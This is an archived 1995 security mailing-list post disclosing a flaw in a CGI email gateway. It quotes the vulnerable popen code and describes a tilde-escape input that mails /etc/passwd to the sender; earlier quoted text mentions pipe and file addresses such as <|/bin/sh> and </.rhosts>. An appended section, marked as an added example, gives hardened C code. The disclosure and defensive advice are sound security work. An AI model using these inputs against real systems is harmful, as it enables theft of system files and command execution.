In message <199508042344.QAA20408@Csli.Stanford.EDU> Christian Wettergren writes:

>| Just to be helpful, the way to do it more safely, without massive
>| need for checking is to build a complete mail message, including
>| header, and hand that to "sendmail -t" which then reads the recipient
>| information out of the constructed header. [Sendmail should of course
>| be an invocation of smail or pp, not the BSD program of that name,
>| given the history of problems that has had]
>
>I suspect this still won't take care of emails to pipes or files,
>i.e. <|/bin/sh> or </.rhosts>; it is a legitimate, albeit unexpected,
>mail command going to sendmail. So unless these two modes are totally
>stripped out of the sendmail, there will exist a vulnerability there,
>won't it?

I've written an email-cgi package myself, and for this package I've used a simple SMTP client written by Wietse Venema. I've been familiar with bugs like tilde-escapes etc. for a while, and this SMTP client does not have any fancy switches, escapes, options etc. Ok, of course you should not use popen() or system() (C) or open/system (Perl), at least not without filtering out '|;' etc., but fork combined with execve works fine and is secure.

You can find smtp.c in the wwwutils package at
ftp://ftp.win.tue.nl/pub/infosystems/www/wwwutils.tar.gz
or directly at
ftp://ftp.nijenrode.nl/pub/people/ivo/smtp.c

Also (perhaps someone already reported this), Thomas Boutell's Email Handler (http://siva.cshl.org/email/index.htm) seems to suffer from this problem. I've reported this a very long time ago to him, but it seems he hasn't fixed it. Thomas Boutell is the maintainer of the WWW-FAQ, and he refers to his handler in it, so it *might* be that a lot of people are using it!
Here's a piece of code from email.c:

    /* recipient is only ever one of the users listed in the config file */
    sprintf(buf, "/usr/bin/mail %s", entries[recipientid].val);
    out = popen(buf, "w");
    fprintf(out, "Subject: %s\n", entries[subjectid].val);
    fprintf(out, "Reply-To: %s\n", entries[emailid].val);
    fprintf(out, "Supposedly-From: %s\n", entries[nameid].val);
    fprintf(out, "[This message was sent through the www-email gateway.]\n");
    fprintf(out, "--\n");
    /* the form's message body goes to /usr/bin/mail unfiltered, ~-escapes included */
    fprintf(out, "%s\n", entries[contentid].val);
    pclose(out);

The popen() here doesn't seem to be insecure: the CGI first checks the recipient against a list of users which are defined in a local config file (whose location is hardcoded into the source). However, this program directly sends the entire message to /usr/bin/mail, including ~-escapes. I've been able to send myself, using this program, a copy of the passwd file by simply typing

    ~!/bin/mail ivo@nijenrode.nl < /etc/passwd

in the message entry of the form. This was on AIX 2.3.

Happy hacking,

Ivo

------------------------------------------------------------------------
Name: Ivo van der Wijk       | It won't give up it wants me dead
Internet: ivo@nijenrode.nl   | this goddamn noise inside my head
Aka: www@nijenrode.nl        | IRC: VladDrac            |  |\|||/|
URL: http://www.nijenrode.nl/~ivo
------------------------------------------------------------------------
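A hardened version of the gateway's send path, added here as an example; it is not code from email.c or from smtp.c. It keeps the allow-list check, refuses bodies containing a tilde-escape line, and starts the mailer with fork/execve on an argv array so no shell ever parses the recipient; the mailer path and argument layout are assumptions.

```c
/* Added example, not the gateway's original code. Assumes a mailer that
 * takes the recipient in argv and reads the message body on stdin. */
#include <signal.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Recipient must match the configured list exactly, so "|/bin/sh" or
 * "/.rhosts" style addresses are never handed to the mailer at all. */
int recipient_allowed(const char *rcpt, const char *const *allow)
{
    for (; *allow != NULL; allow++)
        if (strcmp(rcpt, *allow) == 0) return 1;
    return 0;
}

/* A body line starting with '~' is a tilde-escape to a BSD-style
 * /usr/bin/mail ("~!cmd" runs cmd); refuse such bodies outright. */
int body_has_tilde_escape(const char *body)
{
    if (body[0] == '~') return 1;
    for (const char *p = body; (p = strchr(p, '\n')) != NULL; p++)
        if (p[1] == '~') return 1;
    return 0;
}

/* fork+execve on an argv array instead of popen(): no shell ever sees
 * the recipient, so '|', ';' or '`' in it are inert. The message goes to
 * the child's stdin. Returns the mailer's exit status, or -1 on error. */
int run_mailer(const char *path, char *const argv[], const char *message)
{
    int fd[2], status; pid_t pid;
    if (pipe(fd) == -1 || (pid = fork()) == -1) return -1;
    if (pid == 0) {                     /* child: stdin <- pipe */
        dup2(fd[0], STDIN_FILENO);
        close(fd[0]); close(fd[1]);
        execve(path, argv, (char *const[]){ NULL });
        _exit(127);                     /* exec failed */
    }
    close(fd[0]);
    signal(SIGPIPE, SIG_IGN);           /* mailer may exit before reading */
    for (size_t len = strlen(message), off = 0; off < len; ) {
        ssize_t n = write(fd[1], message + off, len - off);
        if (n <= 0) break;
        off += (size_t)n;
    }
    close(fd[1]);
    if (waitpid(pid, &status, 0) == -1) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

In a real gateway the path would be the site's non-interactive mailer (a placeholder here) with the allow-listed recipient as an argv element; the checks run before run_mailer is ever called.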